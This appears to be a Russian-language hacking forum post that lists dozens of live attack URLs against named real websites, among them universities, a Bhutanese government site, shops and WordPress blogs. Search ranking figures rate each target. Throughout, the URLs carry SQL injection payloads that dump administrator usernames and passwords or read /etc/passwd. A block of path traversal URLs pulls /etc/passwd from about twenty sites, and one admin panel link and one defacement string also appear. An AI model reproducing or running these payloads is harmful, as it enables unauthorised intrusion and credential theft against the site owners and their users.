SQL Инъекции

Ну что поделаешь, наверно администраторы думают: Если сменить пароли взломы прекратятся.

Теперь взлом данного сайта стал традицией (Как Nasa.gov)

 

Билеты

 

ТИЦ == 160, PR == 3, DMOZ == true, ЯК == true;

PHP:

http://www.photohistory.ru/index.php?pid=1207248187984132+and+(select+1+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--

 

http://bec.ucla.EDU/news.php?id=-90+union+select+1,version(),3,4,5,6,7,8,9,10,11--

PR 6

http://www.ece.unm.EDU/news.php?id=-363+union+select+1,version(),3,4,5,6,7,8--

PR 5 ТИЦ 30

 

В меру упитанный сайт.

ТИЦ == 2800, PR == 3, ЯК ==true, DMOZ == true, траф == 12k;

PHP:

http://www.study.ru/test/test.php?id=91'/**/and/**/(select/**/1/**/from(select/**/count(*),concat(database(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1

 

cimco

 

Не люблю риэлтеров.

PHP:

http://www.nightskyrealty.ru/show_res_lot.php?lot=417+and+(select+1+from(  select+count(*),concat(database(),floor(rand(0)*2)  )x+from+information_schema.tables+group+by+x)a)--

Вывод в <title>

 

edu

PHP:

http://cs.furman.edu/blog/index.php?id=null%20union%20all%20select%201,group_concat%28id,0x3a,user,0x3a,password%29 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26%20from%20zp_a  dministrators--

http://www.bzu.edu.pk/news/newsdesc.php?id=2+and+1=0+union+s  elect+1,concat%28username,0x3a,password%29,3,4 ,5,6%20FROM%20users%20--

http://mulibraries.missouri.edu/about/adoptabook/after-details.php?id=-189+u nion+s elect+1,2,3,4,concat%28version%28%29,0x3a,u ser%28%29,0x3a,database%28%29%29,6,7,8+from+information_Schema.tables

http://www.uta.edu/engineering/50/question.php?id=-1+union+select+1,concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+adlogin

http://www.lspr.edu/dev/news/academic.php?id=-90%20union%20all%20select%201,2,3,4,5,6,group_concat%28username,0x3a,p  assword%29,8%20from%20lspr_l ogin--

http://www.punp.edu.ph/main.php?id=-1+u  nion+select+1,2,concat%28login,0x3a,pwd%29,4,5+f rom+u  sers

PHP:

http://www.enlightenmentquartet.com/index.php?id=-999+a nd+1=0+union+all+select+g  roup_concat(ID,0x3a,user_login,0x3a,user_p  ass,0x3a,user_email),2+from+wp_users--

 

pr8

Code:

http://www.ied.edu.hk/jol_e-mag/eng/personality.php?article_id=-50'+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7+--+

[email protected]:4.0.27-standard:temp_sqlsite42

 

riderstour.de PR3

Code:

http://riderstour.de/index.php?id=262&tx_wfqbe_pi1%5BID%5D=-14928+union+select+1,2,3,4,5,6,7,8,9+--+

livebygrace.com PR0

Code:

http://livebygrace.com/database/admin-list-sign-ups-and-process/edit-delete-sign-ups/?tx_wfqbe_pi1%5Bwfqbe_deleting_mode%5D=1&tx_wfqbe_pi1%5BRID%5D=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+--+

eycup.eu PR2

Code:

http://eycup.eu/index.php?id=831&tx_wfqbe_pi1%5BR_ID%5D=-2019+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

www.arhpanama.org PR3

Code:

http://www.arhpanama.org/html/fileadmin/aplicaciones/viewempresa.php?ecode=-163'+union+select+1,2,3,4,5,6,7,8,9+--+

www.beatpatrol.at PR4

Code:

http://www.beatpatrol.at/index.php?show=gallery&mode=detail&gid=-7+union+select+user()+--+

drops.dagstuhl.de PR6

Code:

http://drops.dagstuhl.de/opus/phpoai/oai2.php?verb=ListRecords&set=ddc:330+and+1=0+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+&metadataPrefix=oai_dc

www.telethon.ch PR6

Code:

http://www.telethon.ch/index.php?id=87&id_event=-1290+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.tables+--+&L=

www.blv-sport.de PR4

Code:

http://www.blv-sport.de/index.php?id=232&tx_wfqbe_pi1%5Buid%5D=-375+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+

www.feierwerk.de PR5

Code:

http://feierwerk.de/programm_gesamt/detail_ansicht.html?tx_wfqbe_pi1%5Beid%5D=-1974+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+

 

szkolamarzen.pl

PHP:

http://www.szkolamarzen.pl/gim/newsone.php?id=-493+u nion+select+1,g  roup_concat%28nazwa,0x3a,pass%29,3,4,5+from+u  sers--

админка

Code:

http://www.szkolamarzen.pl/admin/index.html

 

ТИЦ ==80, PR ==3, ЯК == true;

PHP:

http://www.fotodeti.ru/foto_b_en.php?id=-11509+union+select+concat_ws(0x03a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12--

 

http://medelana.com
ТИЦ 10
PR 3

 

До админа достучаться не получилось, поэтому, собственно, что-то типа шопа - сайта фирмы.

ТИЦ == 100, PR == 2, ЯК == true, DMOZ == true;

PHP:

http://www.bobrov.ru/catalog/?catid=-193+union+select+1,2,3,4,concat_ws(0x03a,Id,Login,Pass,UserType),6,7,8,9,10,11,12,13,14,15+from+bbr_users--

 

ТИЦ == 40, PR == 6/10

PHP:

http://www.bhutan.gov.bt/government/newsDetail.php?id=-695+union+select+1,2,concat%28U  SERNAME,0x3a,PASSW%29,4,5  ,6,7,8+from+users--

motormarkt.nl

PHP:

http://www.motormarkt.nl/newsDetail.php?id=145+u nion+select+1,unhex%28hex%28group_concat%28username,0x3a,password%29%29%29,3  ,4,5,6,7+from+w ebmasters--

PHP:

http://popidiot.com/template.php?page=../../../../../../../../../../etc/passwd
http://www.cortezart.com/template.php?page=../../../../../../../../../../etc/passwd
http://www.smartwings.cz/home.php?lang=../../../../../../../../../../etc/passwd
http://www.tsotsi.com/english/index.php?m1=../../../../../../../../../../etc/passwd
http://www.sunmoon.ac.kr/~edujp/photo/board.cgi?id=../../../../../../../../../../etc/passwd
http://www.itn-bremen.de/content.php?pid=../../../../../../../../../../etc/passwd
http://vifaphys.tib.uni-hannover.de/index.php?lang=../../../../../../../../../../etc/passwd
http://www.turismomaso.com/index.php?mod=../../../../../../../../../../etc/passwd
http://www.wjbdradio.com/index.php?f=../../../../../../../../../../etc/passwd
http://kyoshkove.com/index.php?d=../../../../../../../../../../etc/passwd
http://arcangel.sakura.ne.jp/hw/jyosai/test/index.php?site_id=../../../../../../../../../../etc/passwd
http://www.shinboai.ed.jp/w/ak/index.php?site_id=../../../../../../../../../../etc/passwd
http://www.c5pba.ca/index.php?page=../../../../../../../../../../etc/passwd
http://www.hiroyaku.jp/touban/index.php?p=../../../../../../../../../../etc/passwd
http://www.tsubasa-ent.co.jp/index.php?P=../../../../../../../../../../etc/passwd
http://etep.duth.gr/index.php?Link=../../../../../../../../../../etc/passwd
http://www.monstermuleys.com/cgi-bin/stories/site.pl?page=../../../../../../../etc/passwd
http://www.olarkin.com/main/dev/index.php?page=../../../../../../etc/passwd
http://www.ecols.com/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00
http://www.lifecyclescascadeco.com/index.php?p=../../../etc/passwd%00
http://www.billabong-services.co.uk/index.php?body=../../../../etc/passwd

PHP:

http://www.saladillo.gov.ar/notas.php?id=1+and+1=0+union+select+1,2,3,4,5,  6,7,8,9,10--
http://www.thewilliamsbrothers.com/news.php?id=5%20UNION%20SELECT%201,2,3,4,5--
http://www.loopp.com/00/navi/category.php?cate_id=-16161616+union+select+0,1  ,2,3,4,5,6,7,8,9,10,11,12,13,14,pw,version(),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users/*
http://www.aquagardenforum.co.il//modules.php?name=Sections&op=printpage&artid=-1+u nion+select+a id,pwd+from+nuke_authors--
http://www.mbp.dt.pl/index1.php?id=-999+and+1=0+union+all+select+1,2--
http://www.gsamicidellapista.nl/amici/data.php?type=1&id=-999+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,1  3,14,15,16,17,18,19--
http://www.syntaxmedia.nl/show-book.php?id=-999+and+1=0+union+all+select+1,2,3,4,5,g roup_concat%28column_name%29,7,8,  9,10,11,12,13+from+information_schema.columns--
http://www.mhcz.beaudini.nl/team/data.php?type=2&id=-999+and+1=0+union+all+select+1,g roup_concat%28table_name%29,g roup_concat%28table_name%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables--
http://www.gaspforair.org/gasp/gedc/artcl-new.php?ID=-999+and+1=0+union+all+select+1,group_concat%28table_name%29,3,4,5+f rom+information_schema.tables--
http://home.geoenv.biu.ac.il/lecturer_html.php?id=-129+union+select+1,v ersion%28%29,unhex%28hex%28group_concat%28table_name%29%29%29,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables--
http://www.resq.co.il/news/news_details.php?id=-81+UNION+s elect+1,2,3,4,  5,%27Hacked%20BY%20Sina_C0der%27,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42--
http://www.lostcitypictures.com/more.php?id=-999+and+1=0+u nion+all+select+1,2,3,4,5,6,7--
http://www.vhmarine.com/index2.php?id=-9  99+and+1=0+u  nion+all+select+1,2--
http://www.parlidebate.com/index.php?id=-9  99+and+1=0+union+all+select+1,2,3,4,5,6,7+f rom+user--
http://www.thisspartanlife.com/index.php?id=-999+and+1=0+u  nion+all+select+1,2,3,4+f  rom+admin_users--
http://www.nomadcharities.org/index.php?id=-999+and+1=0+u  nion+all+select+1,g roup_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables--
http://www.poeticdiversity.org/main/poemArchive.php?recordID=782+AND+1=0+u nion+all+select+1,2,3,4,5,v  ersion%28%29,7,8,9--
http://www.ericmarcus.com/content/bookdetail.php?recordID=3+AND+1=0+union+a ll+select+1,version%28%29,3,  4,5,6,7,8,9,10,11,12,13--
http://www.phpstreet.com/winxp.php?id=-1+union+select+0,concat_ws%280x3a,g id,g name,gpwd,gmail%29,2+from+sp_g book
http://www.bellavado.com/news_show.php?id_news=-38+union+select+1,c  oncat_ws%280x3a,user_name,0x3a,u  ser_password%29,3,4,5,6,7,8,9+fro%20m+administrators--
http://www.fiacona.org/category_index.php?catid=-95%27+union+select+1,2  ,concat_ws%280x3a,t  able_name,column_name%29,4,5,6,7,8,9,10,11%20,12,13,14,15,16,17,18,19+from+information_schema.columns--%20and%20%271%27=%272
http://www.bkd-bandungkab.com/?fa=content.detail&id=-72+union+select+1,c  oncat_ws%280x3a,u  serid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser--
http://www.biocert.or.id/faq.php?id=-127+union+select+1,concat_ws%280x3a,u  ser_id,username,p  assword,group_id,full_name,date_lastlogin%20,is_active%29,3,4,5+from+tb_user--
http://transitioncoalition.org/transition/assessment_review/view.php?id=7+and+1=0+union+s elect+1,2,concat_ws%280x3a,u  sername,password%29,4,5+from+auth_user--
http://www.eco2000.com.br/capa/ind.php?id=-1+union+select+1,2,3,4,5,6 ,7,8,concat%28user%28%29,0x3a,database%28%29,0x3a,v  ersion%28%29%29,10,11,12+--+
http://www.riff.it/php/show.php?id=-261+union+select+1,unhex%28hex%28g roup_concat%28user_login,0x3a,u ser_pass%29%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--


 

PR == 5, ТИЦ == 10, DMOZ == true;

PHP:

http://www.countline.lt/amz.php?id=-250+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9--

 

_http://www.optomtovar.ru/view_ad1.php?cat=-28+union+select+(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)+--+

_http://ref.mobilluck.com.ua/phones_new.php?referal=mobilniy.com.ua&mode=producer&prodid=567+and+(select+version()%3E=(5))+--+

Радио MAXIMUM

_http://www.ue-ticket.de/meinungen/com_detail.php?idcom=-92'+UnIon+selECt+1,2,3,4,5,6,7,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),load_file('/etc/passwd'),10,11,12,13,14,15,16,17,18,19,20,21+--+

 

Суровый эстонский хип-хоп. PR == 4;

PHP:

http://www.hiphop.ee/uritused_comment.php?party_id=-1257+union+select+count(*)+from+users--

 

ананасы

mog-solutions